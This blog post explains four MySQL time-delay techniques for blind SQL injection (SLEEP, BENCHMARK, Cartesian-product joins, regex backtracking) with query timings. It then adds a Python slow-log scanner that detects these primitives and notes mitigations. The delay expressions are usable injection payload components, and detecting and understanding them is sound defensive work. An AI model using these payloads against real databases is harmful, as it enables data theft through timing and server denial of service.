SQL Injection: Four Time-Based (Delay) Injection Techniques

October 20, 2020 | Web Security

sleep

Needs no explanation.

benchmark

BENCHMARK(count,expr)
The BENCHMARK() function executes the expression expr count times. It can be used to time how fast MySQL processes an expression. The result value is always 0. It is intended for use in the mysql client, which reports the execution time of each query.
mysql> select BENCHMARK(1000000,encode("hello","goodbye"));
+----------------------------------------------+
| BENCHMARK(1000000,encode("hello","goodbye")) |
+----------------------------------------------+
|                                            0 |
+----------------------------------------------+
1 row in set (4.74 sec)

Repeating a single operation count times is what produces the delay.

mysql> select sha(123);
+------------------------------------------+
| sha(123)                                 |
+------------------------------------------+
| 40bd001563085fc35165329ea1ff5c5ecbdbbeef |
+------------------------------------------+
1 row in set (0.00 sec)

mysql> select benchmark(1000000000,sha(123));
+--------------------------------+
| benchmark(1000000000,sha(123)) |
+--------------------------------+
|                              0 |
+--------------------------------+
1 row in set (3 min 26.42 sec)


Cartesian product

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
+------------+
| count(*)   |
+------------+
| 3472910593 |
+------------+
1 row in set (2 min 31.98 sec)

mysql> use test;

Heavy regular-expression matching

RLIKE / REGEXP

mysql> select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
+-------------------------------------------------------------+
| rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b') |
+-------------------------------------------------------------+
|                                                           0 |
+-------------------------------------------------------------+
1 row in set (5.30 sec)

mysql> select rpad('a',4999999,'a') regexp concat(repeat('(a.*)+',30),'b');
+--------------------------------------------------------------+
| rpad('a',4999999,'a') regexp concat(repeat('(a.*)+',30),'b') |
+--------------------------------------------------------------+
|                                                            0 |
+--------------------------------------------------------------+
1 row in set (5.30 sec)

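As an added defender-side example (not code from the original post): a small Python scanner that parses MySQL slow-query-log text and flags statements that use any of the four delay primitives above, reporting each one together with its logged Query_time. The log text is constructed here from the statements shown on this page; the timestamps and durations are made up, and the signatures are heuristics chosen for this example, not anything the post describes.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample in MySQL slow-query-log layout. The statements are the ones
# shown on this page plus one benign query; timestamps and durations are made up.
SAMPLE_SLOW_LOG = """\
# Time: 2020-10-20T10:00:01.000000Z
# Query_time: 0.003000  Lock_time: 0.000100 Rows_sent: 1  Rows_examined: 1
SET timestamp=1603188001;
SELECT name FROM products WHERE id = 42;
# Time: 2020-10-20T10:00:05.000000Z
# Query_time: 5.001200  Lock_time: 0.000100 Rows_sent: 1  Rows_examined: 0
SET timestamp=1603188005;
SELECT SLEEP(5);
# Time: 2020-10-20T10:03:40.000000Z
# Query_time: 206.420000  Lock_time: 0.000100 Rows_sent: 1  Rows_examined: 0
SET timestamp=1603188220;
select benchmark(1000000000,sha(123));
# Time: 2020-10-20T10:06:15.000000Z
# Query_time: 151.980000  Lock_time: 0.000100 Rows_sent: 1  Rows_examined: 0
SET timestamp=1603188375;
SELECT count(*) FROM information_schema.columns A, information_schema.columns B,
information_schema.tables C;
# Time: 2020-10-20T10:06:21.000000Z
# Query_time: 5.300000  Lock_time: 0.000100 Rows_sent: 1  Rows_examined: 0
SET timestamp=1603188381;
select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
"""

@dataclass
class Finding:
    query_time: float   # seconds, as logged in the Query_time field
    primitive: str      # which of the four delay techniques matched
    statement: str      # the normalised SQL text

def normalise(sql: str) -> str:
    """Strip /* */ comments and collapse whitespace so spacing tricks such as
    SLEEP/**/(5) do not slip past the signatures."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    return re.sub(r"\s+", " ", sql).strip()

def classify(sql: str) -> Optional[str]:
    """Return the name of the delay primitive a statement uses, or None."""
    low = normalise(sql).lower()
    if re.search(r"\bsleep\s*\(", low):
        return "sleep"
    if re.search(r"\bbenchmark\s*\(", low):
        return "benchmark"
    # Two or more information_schema tables in one statement: the unconstrained
    # self-join from the page. Heuristic only; schema tools join these tables
    # legitimately, which is why scan() also requires a long Query_time.
    if len(re.findall(r"\binformation_schema\.\w+", low)) >= 2:
        return "cartesian_product"
    # RLIKE/REGEXP with a subject or pattern built by rpad()/repeat(): the
    # backtracking construction from the page.
    if re.search(r"\b(?:rlike|regexp)\b", low) and re.search(r"\b(?:rpad|repeat)\s*\(", low):
        return "regex_backtracking"
    return None

def parse_slow_log(text: str) -> List[Tuple[float, str]]:
    """Return (query_time_seconds, statement) pairs from slow-log text. Only the
    Query_time header and the statement body are parsed; a statement may span
    several lines and ends at the next '# ...' header line."""
    entries: List[Tuple[float, str]] = []
    query_time: Optional[float] = None
    stmt_lines: List[str] = []

    def flush() -> None:
        nonlocal query_time, stmt_lines
        if stmt_lines and query_time is not None:
            entries.append((query_time, " ".join(stmt_lines)))
        stmt_lines, query_time = [], None

    for line in text.splitlines():
        if line.startswith("# Query_time:"):
            query_time = float(line.split()[2])
        elif line.startswith("#"):
            flush()   # '# Time:' (or any other header) starts the next entry
        elif line.lower().startswith(("set timestamp=", "use ")):
            pass      # bookkeeping lines the server writes before each statement
        elif line.strip():
            stmt_lines.append(line.strip())
    flush()
    return entries

def scan(text: str, min_seconds: float = 1.0) -> List[Finding]:
    """Flag entries that both match a delay signature and ran for at least
    min_seconds; requiring both keeps ordinary slow queries and harmless
    mentions of the function names out of the report."""
    findings: List[Finding] = []
    for query_time, stmt in parse_slow_log(text):
        primitive = classify(stmt)
        if primitive is not None and query_time >= min_seconds:
            findings.append(Finding(query_time, primitive, normalise(stmt)))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_SLOW_LOG):
        print(f"{f.query_time:8.2f}s  {f.primitive:<18}  {f.statement}")
```

Run as a script it prints the four flagged entries and skips the benign lookup. Signature matching alone is noisy (schema tools do join information_schema tables, and ORMs can emit REGEXP), so the scanner reports only entries whose Query_time also exceeds a threshold; the slow log has to be enabled with long_query_time low enough to capture them. On MySQL 5.7.8 and later the max_execution_time system variable (milliseconds, SELECT statements only) caps how long any of these primitives can hold a connection, and parameterized queries remove the injection point that makes the delay observable in the first place.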
